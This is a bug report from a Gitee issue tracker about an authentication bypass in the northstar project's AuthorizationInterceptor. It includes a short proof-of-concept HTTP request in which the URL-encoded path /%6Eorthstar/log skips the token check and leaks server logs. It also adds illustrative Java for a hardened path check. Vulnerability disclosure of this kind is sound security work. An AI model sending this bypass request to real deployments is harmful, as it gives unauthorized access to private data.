[Bug]: There is an Incorrect Access Control vulnerability in northstar
Completed
#ICCQ4E
张淇伊
Created on 2025-06-05 10:33
### Does this issue already exist?

- [x] I have searched the existing issues (https://gitee.com/dromara/northstar/issues)

### How to reproduce

1. version: <= v7.3.5 (commit 2ab1f621ac0a93e4a05b99f1430f9a1a3ebf0e8b)
2. problem: There is an authentication bypass vulnerability in northstar. An attacker can exploit this vulnerability to access the `/northstar/*` API without any token.
3. source code analysis:
   - The affected source code class is `org.dromara.northstar.web.interceptor.AuthorizationInterceptor`, and the affected function is `preHandle`. The filter code uses `request.getRequestURI()` to obtain the request path, and then determines whether the `path` startsWith `/northstar/auth/login` but not startsWith `/northstar`, etc. If the condition is met, it will execute `return true` to bypass the Interceptor. Otherwise, it will block the current request.
   - The problem lies in using `request.getRequestURI()` to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use URL encoding to bypass it.
   - Taking one of the backend interfaces `/northstar/log` as an example, using `/%6Eorthstar/log` can make it bypass the `AuthorizationInterceptor`, and at the same time, it allows the log content to leak.
4. reproduce the vulnerability

```
GET /%6Eorthstar/log?positionOffset=0&tailNumOfLines=100 HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Connection: keep-alive
Cookie: JSESSIONID=3423C5F9E5AC5521378700D5EB2E0665
```

### Expected result

```
{
  "timestamp": 1749090153426,
  "status": 401,
  "error": "Unauthorized",
  "path": "/northstar/log"
}
```

### Actual result

```
{
  "status": 200,
  "message": null,
  "data": {
    "startPosition": 0,
    "endPosition": 31649,
    "linesOfLog": [ ... ]
  }
}
```

### Screenshots or video

- normal request
- attack request

### Affected version

v7.3.5 (master branch)
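An added example, not northstar's code and not part of the original report: the raw-URI prefix check the report describes, next to a fail-closed variant that lets a path skip the token check only when it is written in plain literal form. The class and method names are hypothetical; the two path constants and the `/%6Eorthstar/log` input come from the report, and the other sample paths are constructed.

```java
import java.util.List;
import java.util.regex.Pattern;

public class InterceptorPathCheck {

    // Prefixes named in the report.
    static final String API_PREFIX = "/northstar";
    static final String LOGIN_PATH = "/northstar/auth/login";

    // One path segment made only of characters that never need percent-encoding.
    private static final Pattern SEGMENT = Pattern.compile("[A-Za-z0-9._~-]+");

    /**
     * The check as the report describes it: the decision is made on the raw
     * string returned by getRequestURI(), which the container has not decoded.
     */
    static boolean skipsTokenCheckRaw(String rawUri) {
        return rawUri.startsWith(LOGIN_PATH) || !rawUri.startsWith(API_PREFIX);
    }

    /**
     * True only when the raw path is already in literal form: no percent
     * escapes, no path parameters, no empty or dot segments. For such a path
     * the raw string and the path the framework routes on are the same.
     */
    static boolean isPlainPath(String rawUri) {
        if (!rawUri.startsWith("/")) {
            return false;
        }
        String[] segments = rawUri.substring(1).split("/", -1);
        for (int i = 0; i < segments.length; i++) {
            String s = segments[i];
            if (s.isEmpty()) {
                // An empty segment is accepted only as a trailing slash (or "/").
                if (i != segments.length - 1) {
                    return false;
                }
                continue;
            }
            if (s.equals(".") || s.equals("..") || !SEGMENT.matcher(s).matches()) {
                return false;
            }
        }
        return true;
    }

    /**
     * Fail-closed variant: a path that is not plain never qualifies for the
     * "public" shortcut, so it always goes through token validation.
     */
    static boolean skipsTokenCheckHardened(String rawUri) {
        if (!isPlainPath(rawUri)) {
            return false;
        }
        boolean underApi = rawUri.equals(API_PREFIX) || rawUri.startsWith(API_PREFIX + "/");
        // Exact match on the login endpoint instead of a prefix match.
        return rawUri.equals(LOGIN_PATH) || !underApi;
    }

    public static void main(String[] args) {
        // The third entry is the request path from the report; the rest are constructed.
        List<String> samples = List.of(
                "/northstar/auth/login",
                "/northstar/log",
                "/%6Eorthstar/log",
                "/index.html");

        System.out.printf("%-24s %-10s %-10s%n", "raw URI", "reported", "hardened");
        for (String uri : samples) {
            System.out.printf("%-24s %-10s %-10s%n",
                    uri,
                    skipsTokenCheckRaw(uri) ? "skipped" : "checked",
                    skipsTokenCheckHardened(uri) ? "skipped" : "checked");
        }
    }
}
```

In a Spring MVC application the same effect is usually obtained by scoping the interceptor with `addPathPatterns`/`excludePathPatterns`, which match on the path Spring routes with rather than on the raw URI.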